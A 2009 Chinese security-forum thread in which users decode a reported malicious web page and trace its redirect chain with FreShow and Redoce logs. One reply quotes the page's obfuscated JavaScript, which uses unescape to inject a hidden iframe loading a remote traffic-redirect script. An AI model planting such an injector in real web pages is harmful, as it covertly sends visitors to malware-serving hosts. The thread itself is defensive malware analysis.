12   1  /  2  页   跳转

[讨论] omyakicari.com/images/wait.html

收藏
kekao
头像
快乐黄口狮
  • 帖子:151
  • 注册: 2008-03-08
  • 来自:
发表于: 2009-07-06 19:12 | 只看楼主 短消息 资料
字号: 1楼

omyakicari.com/images/wait.html

请教一下.详细说明一下过程 谢谢!(恶意网址,不要随便打开)

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
分享到:
gototop
 
gtyre2
头像
快乐黄口狮
  • 帖子:179
  • 注册: 2009-07-02
  • 来自:
发表于: 2009-07-06 20:16 | 短消息 资料
字号: 2楼

回复: omyakicari.com/images/wait.html

不是恶意网站吧
网盾进去没报



引用:
http://omyakicari.com/images/wait.html


页面上有一段ShellCode
取这段


引用:
<script language="javascript">
document.write( unescape( '%3C%64%69%76%20%73%74%79%6C%65%3D%27%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%6C%65%66%74%3A%2D%31%30%30%25%3B%20%77%69%64%74%68%3A%31%30%30%25%3B%20%68%65%69%67%68%74%3A%31%30%30%25%3B%27%3E%3C%69%66%72%61%6D%65%20%73%74%79%6C%65%3D%27%77%69%64%74%68%3A%31%30%30%25%3B%68%65%69%67%68%74%3A%32%30%30%30%27%20%77%69%64%74%68%3D%27%31%30%30%25%27%20%68%65%69%67%68%74%3D%27%32%30%30%30%27%20%73%63%72%6F%6C%6C%69%6E%67%3D%27%6E%6F%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%6E%6F%27%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%27%30%27%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%27%30%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%73%69%6D%70%61%2D%6C%75%78%2E%63%6F%6D%2F%74%73%2F%69%6E%2E%63%67%69%3F%62%61%67%67%69%36%27%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%64%69%76%3E' ) );
</script>

然后弹窗得到



引用:
http://simpa-lux.com/ts/in.cgi?baggi6
最后编辑gtyre2 最后编辑于 2009-07-06 20:18:54
gototop
 
xiaoqiang305
头像
初生襁褓狮
  • 帖子:36
  • 注册: 2009-06-10
  • 来自:
发表于: 2009-07-06 20:23 | 短消息 资料
字号: 3楼

回复 2F gtyre2 的帖子

freshow直接esc一下就出来了~~但楼主问的肯定不是这个 是往下怎么解
最后编辑xiaoqiang305 最后编辑于 2009-07-06 20:41:27
gototop
 
gtyre2
头像
快乐黄口狮
  • 帖子:179
  • 注册: 2009-07-02
  • 来自:
发表于: 2009-07-06 20:41 | 短消息 资料
字号: 4楼

回复:omyakicari.com/images/wait.html

出来这些

Log is generated by FreShow.
[wide]http://omyakicari.com/images/wait.html
    [frame]http://w-netex.com/pore/?7876256053563003de306eb5c094240d
    [frame]http://linotraffic.com/ts/in.cgi?410
最后编辑gtyre2 最后编辑于 2009-07-06 20:42:26
gototop
 
kekao
头像
快乐黄口狮
  • 帖子:151
  • 注册: 2008-03-08
  • 来自:
发表于: 2009-07-06 22:21 | 只看楼主 短消息 资料
字号: 5楼

回复:omyakicari.com/images/wait.html

能否继续解了.看看是否能下载什么?
gototop
 
gtyre2
头像
快乐黄口狮
  • 帖子:179
  • 注册: 2009-07-02
  • 来自:
发表于: 2009-07-06 22:31 | 短消息 资料
字号: 6楼

回复:omyakicari.com/images/wait.html

无网马
gototop
 
kekao
头像
快乐黄口狮
  • 帖子:151
  • 注册: 2008-03-08
  • 来自:
发表于: 2009-07-07 10:23 | 只看楼主 短消息 资料
字号: 7楼

回复 6F gtyre2 的帖子

竟然说没有网马.网马时刻在更新
gototop
 
gtyre2
头像
快乐黄口狮
  • 帖子:179
  • 注册: 2009-07-02
  • 来自:
发表于: 2009-07-07 10:30 | 短消息 资料
字号: 8楼

回复: omyakicari.com/images/wait.html

今天进去网盾报的是这个


引用:
http://brasilianstoree.info/k.php?btn

不过还是解不了
gototop
 
shadowmin
头像
拙长孩提狮
  • 帖子:69
  • 注册: 2007-10-27
  • 来自:
发表于: 2009-07-07 12:07 | 短消息 资料
字号: 9楼

回复:omyakicari.com/images/wait.html

关于:hxxp://brasilianstoree.info/k.php?btn解密的日志(全体输出 -  3):

Level  0>http://brasilianstoree.info/k.php?btn
Level  1>http://brasilianstoree.info/k.php?rgljklxskwkkzkekkkffygjezwkejzyjrugkkyiwcwlrwxzz0800
Level  2>http://brasilianstoree.info/k.php?rgljklxskwkkzkekkwffygjezwkejzyjrugkkyiwcwlcjzkkkckkszkkkkkkkkke

日志由 Redoce1.9第68次修正版于 2009-7-7 12:10:21 生成。
只解出这么多,然后就连不上了。
gototop
 
kekao
头像
快乐黄口狮
  • 帖子:151
  • 注册: 2008-03-08
  • 来自:
发表于: 2009-07-07 13:18 | 只看楼主 短消息 资料
字号: 10楼

回复 9F shadowmin 的帖子

请问题你这个如何得到下两个地址的.详解一下.
gototop
 
<<上一主题|下一主题>>
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT